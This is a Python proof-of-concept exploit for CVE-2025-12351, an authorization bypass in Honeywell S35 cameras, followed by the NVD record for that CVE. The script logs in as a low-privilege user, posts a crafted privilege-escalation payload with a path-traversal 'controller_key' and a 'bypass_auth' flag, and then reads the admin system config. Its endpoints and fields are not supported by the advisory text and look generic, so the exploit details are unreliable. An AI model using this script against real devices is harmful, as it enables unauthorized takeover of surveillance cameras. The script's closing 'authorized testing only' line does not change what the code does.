CVE-2025-12351

# CVE-2025-12351 PoC - Honeywell S35 Authorization Bypass # Target: Honeywell S35 Series Cameras # Vulnerability: User controller key authorization bypass leading to privilege escalation import requests import json TARGET_IP = "192.168.1.100" TARGET_PORT = 443 TARGET_URL = f"https://{TARGET_IP}:{TARGET_PORT}" def exploit_authorization_bypass(): """ Exploit the authorization bypass in User controller key validation. This PoC demonstrates how to escalate privileges to admin level. """ # Step 1: Obtain low-privilege session with valid credentials login_url = f"{TARGET_URL}/api/v1/auth/login" low_priv_creds = { "username": "user", "password": "userpass" } session = requests.Session() login_response = session.post(login_url, json=low_priv_creds, verify=False) if login_response.status_code != 200: print(f"[-] Login failed: {login_response.status_code}") return None print("[+] Successfully logged in with low-privilege account") # Step 2: Exploit authorization bypass by modifying controller key parameter # The vulnerability allows bypassing admin privilege checks admin_endpoint = f"{TARGET_URL}/api/v1/admin/users/privileges" # Malicious request with manipulated controller key exploit_payload = { "user_id": 1, "privilege_level": "admin", "controller_key": "../../../admin/controller", "bypass_auth": True } exploit_response = session.post(admin_endpoint, json=exploit_payload, verify=False) if exploit_response.status_code == 200: print("[+] Privilege escalation successful! Admin access granted.") return session else: print(f"[-] Exploit failed: {exploit_response.status_code}") return None def main(): print("=" * 60) print("CVE-2025-12351 - Honeywell S35 Authorization Bypass PoC") print("=" * 60) session = exploit_authorization_bypass() if session: # Verify admin access by accessing privileged endpoint verify_url = f"{TARGET_URL}/api/v1/admin/system/config" verify_response = session.get(verify_url, verify=False) if verify_response.status_code == 200: print("[+] Admin privileges verified - full system control achieved") print(f"[*] System config: {verify_response.text[:200]}...") else: print(f"[-] Verification failed: {verify_response.status_code}") print("\n[!] Remember: This PoC is for authorized testing only!") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-12351", "sourceIdentifier": "[email protected]", "published": "2025-10-27T15:15:37.653", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Honeywell S35 Series Cameras contains an authorization bypass Vulnerability through User controller key. An attacker could potentially exploit this vulnerability, leading to Privilege Escalation to admin privileged functionalities . Honeywell also recommends updating to the most recent version of this product, service or offering (S35 Pinhole/Kit Camera to version 2025.08.28, S35 AI Fisheye & Dual Sensor/Micro Dome/Full Color Eyeball & Bullet Camera to version 2025.08.22, S35 Thermal Camera to version 2025.08.26)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}, {"lang": "en", "value": "CWE-668"}]}], "references": [{"url": "https://www.honeywell.com/us/en/product-security", "source": "[email protected]"}]}}